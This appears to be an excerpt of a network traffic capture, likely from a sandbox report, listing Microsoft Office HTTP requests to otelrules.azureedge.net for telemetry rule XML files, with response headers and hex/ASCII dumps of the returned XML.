2024-11-07 03:13:13 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031313Z-16547b76f7f2g4rlhC1DFWnx8800000007h000000000583g x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:13 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:13 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:13 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 7751afc8-a01e-00ab-7158-2e9106000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031313Z-17df447cdb5g2j9ghC1DFWev0800000003gg00000000nypp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:13 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	49849	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:13 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:13 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 37c49176-f01e-0003-705c-2e4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031313Z-15869dbbcc6rmhmhhC1DFWd7b800000007zg00000000kx5e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:13 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:13 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:14 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:13 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 6a3542ff-401e-0078-3058-2e4d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031313Z-15869dbbcc6m5ms4hC1DFWx02800000008p0000000001mwc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 03:13:14 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:15 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:15 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:15 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031315Z-16547b76f7f76p6chC1DFWctqw00000007m000000000n1ty x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:15 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:15 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:15 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:15 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031315Z-16547b76f7fp46ndhC1DFW66zg00000007f000000000vcud x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:15 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:15 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:15 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:15 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 3caab4b0-601e-005c-26d2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031315Z-16547b76f7fnm7lfhC1DFWkxt400000007k00000000024t9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:15 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:15 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:15 UTC	538	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:15 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 3caab57d-601e-005c-6cd2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031315Z-16547b76f7f775p5hC1DFWzdvn00000007gg00000000fchr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:15 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:15 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:15 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:15 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 34ab5445-001e-0079-1b58-2e12e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031315Z-17df447cdb56j5xmhC1DFWn91800000003t000000000k8zh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:15 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.4	49862	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:16 UTC	192	OUT	GET /rules/rule702950v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:16 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:16 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT ETag: "0x8DC582BDDC22447" x-ms-request-id: 75393bc5-a01e-00ab-63e1-2f9106000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031316Z-17df447cdb5qkskwhC1DFWeeg400000003z0000000002fnp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:16 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.4	49861	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:16 UTC	192	OUT	GET /rules/rule702951v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:16 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:16 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE12B5C71" x-ms-request-id: f6a1aa81-001e-008d-5f60-2ed91e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031316Z-15869dbbcc6b2ncxhC1DFW2ztg000000013g00000000cgbe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:16 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.4	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:16 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:16 UTC	494	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:16 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 94dca2eb-101e-0079-6355-2e5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031316Z-17df447cdb5w28bthC1DFWgb6400000003mg000000005nrc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
